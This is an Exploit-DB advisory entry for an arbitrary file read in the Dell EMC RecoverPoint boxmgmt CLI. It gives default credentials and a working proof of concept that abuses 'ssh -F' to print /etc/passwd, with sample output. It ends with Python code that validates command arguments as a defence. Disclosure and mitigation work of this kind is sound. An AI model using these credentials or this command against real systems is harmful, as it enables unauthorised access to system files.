Dell EMC RecoverPoint boxmgmt CLI < 5.1.2 - Arbitrary File Read

  • Author: Paul Taylor
    Date: 2018-05-22
  • Category:
    Platform:
  • Source: https://www.exploit-db.com/exploits/44688/
  • # Exploit Title: Dell EMC RecoverPoint boxmgmt CLI < 5.1.2 - Arbitrary File Read
    # Version: All versions before RP 5.1.2, and all versions before RP4VMs 5.1.1.3
    # Date: 2018-05-21
    # Vendor Advisory: DSA-2018-095
    # Vendor KB: https://support.emc.com/kb/521234
    # Exploit Author: Paul Taylor
    # Github: https://github.com/bao7uo/dell-emc_recoverpoint
    # Website: https://www.foregenix.com/blog/foregenix-identify-dell-emc-recoverpoint-zero-day-vulnerabilities
    # Tested on: RP4VMs 5.1.1.2, RP 5.1.SP1.P2
    # CVE: N/A
     
    # 1. Description
    # When logging in as boxmgmt and running an internal command, the ssh command may be used
    # to display the contents of files from the file system which are accessible to the boxmgmt user.
     
    # 2. Proof of Concept
    # Log in as boxmgmt via SSH (default credentials boxmgmt/boxmgmt)
    # Select [3] Diagnostics
    # Select [5] Run Internal Command
    # ssh -F /etc/passwd 127.0.0.1
    
    test-cluster: 5
    This is the list of commands you are allowed to use: ALAT NetDiag arp arping date ethtool kps.pl netstat ping ping6 ssh telnet top uptime
    Enter internal command: ssh -F /etc/passwd 127.0.0.1
    /etc/passwd: line 1: Bad configuration option: root:x:0:0:root:/root:/bin/tcsh
    /etc/passwd: line 2: Bad configuration option: daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
    /etc/passwd: line 3: Bad configuration option: bin:x:2:2:bin:/bin:/usr/sbin/nologin
    <SNIP>
    /etc/passwd: terminating, 34 bad configuration options
    Command "ssh -F /etc/passwd 127.0.0.1" exited with return code 65280
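
The session above shows the menu checking only the command name, which leaves ssh free to take `-F` and echo the named file back through its parser errors. The following is an added example, not code from the advisory or from Dell EMC's fix: it contrasts a name-only check with a strict per-command argument grammar. The function names and the `ssh <ip>` / `ssh -p <port> <ip>` policy are assumptions made for illustration.

```python
import ipaddress
import shlex

# Command names copied from the menu output on this page.
ALLOWED = {"ALAT", "NetDiag", "arp", "arping", "date", "ethtool", "kps.pl",
           "netstat", "ping", "ping6", "ssh", "telnet", "top", "uptime"}


def name_only_check(line):
    """Weak check: looks at the command name and ignores its arguments."""
    try:
        argv = shlex.split(line)
    except ValueError:  # unbalanced quotes
        return False
    return bool(argv) and argv[0] in ALLOWED


def _is_ip(token):
    try:
        ipaddress.ip_address(token)
        return True
    except ValueError:
        return False


def _is_port(token):
    return token.isascii() and token.isdigit() and 1 <= int(token) <= 65535


def strict_ssh_check(line):
    """Hypothetical policy: accept only `ssh <ip>` or `ssh -p <port> <ip>`.

    Every other option is refused, so none that names a file (such as the
    -F used on this page) can reach the real ssh binary.
    """
    try:
        argv = shlex.split(line)
    except ValueError:  # unbalanced quotes
        return False
    if not argv or argv[0] != "ssh":
        return False
    args = argv[1:]
    if len(args) == 1:
        return _is_ip(args[0])
    if len(args) == 3 and args[0] == "-p":
        return _is_port(args[1]) and _is_ip(args[2])
    return False
```

The same pattern applies to every entry in the menu: each allowed command gets its own explicit argument grammar, and anything outside it is rejected before execution.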